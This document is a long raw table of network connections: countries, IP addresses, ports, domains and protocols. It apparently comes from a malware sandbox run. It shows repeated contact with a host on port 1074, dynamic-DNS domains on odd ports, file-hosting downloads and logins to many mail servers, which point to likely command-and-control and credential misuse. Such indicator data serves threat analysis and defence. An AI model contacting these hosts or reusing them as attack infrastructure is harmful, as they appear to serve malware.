| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 195.201.255.35:443 | tcp | |
| RU | 91.215.85.63:8118 | gservicese.com | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| DE | 195.201.255.35:443 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 162.240.81.18:80 | www.irmaosconstrusilva.store | tcp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | api.twitter.com | udp |
| US | 104.244.42.194:443 | api.twitter.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | apiv2.jofogas.hu | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.ljwixsb.top | udp |
| US | 8.8.8.8:53 | jnb-efz.ms-acdc.office.com | udp |
| ZA | 52.98.20.178:443 | jnb-efz.ms-acdc.office.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| ZA | 52.98.20.178:443 | jnb-efz.ms-acdc.office.com | tcp |
| ZA | 52.98.20.178:443 | jnb-efz.ms-acdc.office.com | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| ZA | 52.98.20.178:443 | jnb-efz.ms-acdc.office.com | tcp |
| US | 8.8.8.8:53 | 112.69.33.194.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 178.20.98.52.in-addr.arpa | udp |
| ZA | 52.98.20.178:443 | jnb-efz.ms-acdc.office.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | as.wiz.cn | udp |
| US | 8.8.8.8:53 | apiv2.jofogas.hu | udp |
| CN | 120.55.138.92:443 | as.wiz.cn | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| NL | 157.240.247.63:443 | i.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 63.247.240.157.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.3gnz.com | udp |
| US | 172.67.181.168:80 | www.3gnz.com | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| US | 8.8.8.8:53 | 168.181.67.172.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | mail.zeelandnet.nl | udp |
| NL | 62.45.70.150:143 | mail.zeelandnet.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | mail.be | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | 150.70.45.62.in-addr.arpa | udp |
| GB | 212.3.242.82:993 | mail.be | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | work.a-poster.info | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| DE | 136.243.92.92:80 | www.mobdigim.com | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| US | 8.8.8.8:53 | imap.telenet.be | udp |
| BG | 185.141.63.4:1074 | tcp | |
| BE | 195.130.132.15:993 | imap.telenet.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.paypal.com | udp |
| US | 192.229.221.25:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | listpoints.click | udp |
| RU | 91.215.85.63:7020 | listpoints.click | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | imap.ziggo.nl | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| NL | 84.116.6.3:993 | imap.ziggo.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.194.2.86:80 | www.finebb.net | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BE | 195.130.132.15:993 | imap.telenet.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 37.1.217.172:25000 | work.a-poster.info | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HK | 34.92.57.107:80 | www.yf168vip.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | www.gzshbsh.net | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HK | 168.76.252.79:80 | www.gzshbsh.net | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 79.252.76.168.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.248.169.48:80 | www.spacecargo.net | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| GB | 212.3.242.82:143 | mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | datastream.myvnc.com | udp |
| RU | 91.215.85.63:5225 | datastream.myvnc.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.248.169.48:80 | www.spacecargo.net | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 129.153.80.87:8855 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| FR | 157.240.196.63:443 | i.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| GB | 212.3.242.82:993 | mail.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 157.240.201.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | jnb-efz.ms-acdc.office.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| ZA | 52.98.18.2:443 | jnb-efz.ms-acdc.office.com | tcp |
| ZA | 52.98.18.2:443 | jnb-efz.ms-acdc.office.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| ZA | 52.98.18.2:443 | jnb-efz.ms-acdc.office.com | tcp |
| US | 192.229.221.25:443 | www.paypal.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| US | 8.8.8.8:53 | 2.18.98.52.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| ZA | 52.98.18.2:443 | jnb-efz.ms-acdc.office.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 142.250.102.102:443 | s.youtube.com | tcp |
| ZA | 52.98.18.2:443 | jnb-efz.ms-acdc.office.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | imap.kpnmail.nl | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| US | 8.8.8.8:53 | 102.102.250.142.in-addr.arpa | udp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 195.121.65.133:993 | imap.kpnmail.nl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 172.67.181.168:80 | www.3gnz.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | gservicese.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 91.215.85.63:2718 | gservicese.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.253:80 | ewixgdb.ua | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| TR | 185.83.146.204:80 | www.hreeremaeps.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 84.116.6.3:993 | imap.ziggo.nl | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | service-domain.xyz | udp |
| US | 3.80.150.121:443 | service-domain.xyz | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 208.91.197.132:80 | www.shopbons-mall.com | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | center.onthewifi.com | udp |
| RU | 91.215.85.63:8118 | center.onthewifi.com | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 192.229.221.25:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.instagram.com | udp |
| NL | 157.240.247.174:443 | www.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 188.114.97.0:80 | www.bord90-1us.click | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.whoops.store | udp |
| DE | 3.64.163.50:80 | www.whoops.store | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | 50.163.64.3.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 34.120.175.65:80 | www.333vvs.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | api.steampowered.com | udp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| NL | 23.222.49.98:80 | api.steampowered.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | imap.poczta.onet.pl | udp |
| PL | 213.180.147.154:993 | imap.poczta.onet.pl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 129.153.80.87:8855 | tcp | |
| US | 8.8.8.8:53 | 154.147.180.213.in-addr.arpa | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.112:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | apiv2.jofogas.hu | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.amazon.com | udp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 18.239.70.131:443 | www.amazon.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | www.viddry.online | udp |
| NL | 37.97.254.27:80 | www.viddry.online | tcp |
| BE | 195.13.7.87:993 | imap.proximus.be | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| US | 8.8.8.8:53 | 131.70.239.18.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.254.97.37.in-addr.arpa | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | www.strategicprojectmgmt.com | udp |
| US | 8.8.8.8:53 | listpoints.online | udp |
| US | 8.8.8.8:53 | retghrtgwtrgtg.bounceme.net | udp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| RU | 91.215.85.63:3839 | retghrtgwtrgtg.bounceme.net | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| RU | 185.172.128.100:80 | 185.172.128.100 | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 8.8.8.8:53 | i.instagram.com | udp |
| FR | 157.240.196.63:443 | i.instagram.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | files.catbox.moe | udp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| PL | 213.180.147.154:993 | imap.poczta.onet.pl | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 194.49.94.152:50500 | tcp | |
| US | 8.8.8.8:53 | www.tecverse.xyz | udp |
| US | 203.161.61.170:80 | www.tecverse.xyz | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| RU | 193.37.71.22:80 | 193.37.71.22 | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 8.8.8.8:53 | s.youtube.com | udp |
| US | 151.101.1.21:443 | www.paypal.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| NL | 142.250.102.138:443 | s.youtube.com | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
| BG | 185.141.63.4:1074 | tcp | |
| US | 13.107.42.13:443 | onedrive.live.com | tcp |
| CA | 108.181.20.37:443 | files.catbox.moe | tcp |
| US | 188.114.96.9:80 | www.cmmug.asia | tcp |
| HU | 194.33.69.111:443 | apiv2.jofogas.hu | tcp |
